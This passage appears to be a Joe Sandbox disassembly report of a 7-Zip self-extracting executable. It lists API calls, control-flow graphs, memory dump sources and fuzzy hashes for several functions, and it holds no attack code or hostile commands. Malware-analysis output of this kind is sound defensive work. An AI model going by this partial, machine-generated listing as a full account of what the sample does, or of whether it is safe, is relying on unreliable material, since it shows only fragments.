                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                              • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                              • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                              • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                              • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                              • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                            • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                            • _wtol.MSVCRT ref: 00405F65
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                            • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerWindowlstrcpymemcmpwsprintf$AttributesCloseCommandCreateCurrentDestroyDirectoryDispatchErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateVersionWait_wcsnicmpmemmovememsetwvsprintf
                                                            • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                            • API String ID: 3696187633-3058303289
                                                            • Opcode ID: 819a16367885825f4e344e77836869b1f6d7740230357e2b02187f71ec59b593
                                                            • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                            • Opcode Fuzzy Hash: 819a16367885825f4e344e77836869b1f6d7740230357e2b02187f71ec59b593
                                                            • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D
                                                            Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017e3 call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 714 4017e8-4017eb 710->714 715 401804-401809 711->715 714->697 716 4017f1-4017f3 714->716 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                            • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                            • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                            • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58
                                                            Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                            • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 1799206407-0
                                                            • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                            • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                            • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                            • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                            Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                            • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: DiskFreeMessageSendSpace
                                                            • String ID:
                                                            • API String ID: 696007252-0
                                                            • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                            • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                            • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                            • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D
                                                            Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                            • String ID: HpA
                                                            • API String ID: 801014965-2938899866
                                                            • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                            • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                            • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                            • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58
                                                            Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                            • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                            • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                            • DispatchMessageW.USER32(?), ref: 00401B89
                                                            • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                            • DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateDestroyDispatchHandleKillModule
                                                            • String ID: Static
                                                            • API String ID: 1156981321-2272013587
                                                            • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                            • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                            • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                            • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9
                                                            Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 781 40b163-40b183 call 40f0b6 784 40b2f6-40b2f9 781->784 785 40b189-40b190 call 40ac2d 781->785 788 40b192-40b194 785->788 789 40b199-40b1d6 call 40adc3 memcpy 785->789 788->784 792 40b1d9-40b1dd 789->792 793 40b202-40b221 792->793 794 40b1df-40b1f2 792->794 800 40b2a2 793->800 801 40b223-40b22b 793->801 795 40b297-40b2a0 ??3@YAXPAX@Z 794->795 796 40b1f8 794->796 799 40b2f4-40b2f5 795->799 796->793 797 40b1fa-40b1fc 796->797 797->793 797->795 799->784 802 40b2a4-40b2a5 800->802 803 40b2a7-40b2aa 801->803 804 40b22d-40b231 801->804 805 40b2ed-40b2f2 ??3@YAXPAX@Z 802->805 803->802 804->793 806 40b233-40b243 804->806 805->799 807 40b245 806->807 808 40b27a-40b292 memmove 806->808 809 40b254-40b258 807->809 808->792 810 40b25a 809->810 811 40b24c-40b24e 809->811 812 40b25c 810->812 811->812 813 40b250-40b251 811->813 812->808 814 40b25e-40b267 call 40ac2d 812->814 813->809 817 40b269-40b278 814->817 818 40b2ac-40b2e5 memcpy call 40dcfb 814->818 817->808 819 40b247-40b24a 817->819 820 40b2e8-40b2eb 818->820 819->809 820->805
                                                            APIs
                                                            • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                            • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@memcpymemmove
                                                            • String ID:
                                                            • API String ID: 3549172513-3916222277
                                                            • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                            • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                            • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                            • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D
                                                            Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145stringtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 822 403354-40337a lstrlenW call 4024fc 825 403385-403391 822->825 826 40337c-403380 call 40112b 822->826 828 403393-403397 825->828 829 403399-40339f 825->829 826->825 828->829 830 4033a2-4033a4 828->830 829->830 831 4033c8-4033d1 call 401986 830->831 834 4033d3-4033e6 GetSystemTimeAsFileTime GetFileAttributesW 831->834 835 4033b7-4033b9 831->835 838 4033e8-4033f6 call 40301a 834->838 839 4033ff-403408 call 401986 834->839 836 4033a6-4033ae 835->836 837 4033bb-4033bd 835->837 836->837 844 4033b0-4033b4 836->844 840 4033c3 837->840 841 403477-40347d 837->841 838->839 852 4033f8-4033fa 838->852 853 403419-40341b 839->853 854 40340a-403417 call 407776 839->854 840->831 848 4034a7-4034ba call 407776 ??3@YAXPAX@Z 841->848 849 40347f-40348a 841->849 844->837 845 4033b6 844->845 845->835 865 4034bc-4034c0 848->865 849->848 850 40348c-403490 849->850 850->848 856 403492-403497 850->856 860 40349c-4034a5 ??3@YAXPAX@Z 852->860 857 40346b-403475 ??3@YAXPAX@Z 853->857 858 40341d-40343c memcpy 853->858 854->852 856->848 862 403499-40349b 856->862 857->865 863 403451-403455 858->863 864 40343e 858->864 860->865 862->860 867 403440-403448 863->867 868 403457-403464 call 401986 863->868 866 403450 864->866 866->863 867->868 869 40344a-40344e 867->869 868->854 872 403466-403469 868->872 869->866 869->868 872->857 872->858
                                                            APIs
                                                            • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                              • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                              • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                            • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.84739528062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.84739482791.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739558347.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739585827.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.84739606233.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_CnjMEmbChO.jbxd
                                                            Similarity
                                                            • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 846840743-0
                                                            • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                            • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                            • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                            • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD
                                                            Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                              • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                              • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                              • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                              • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
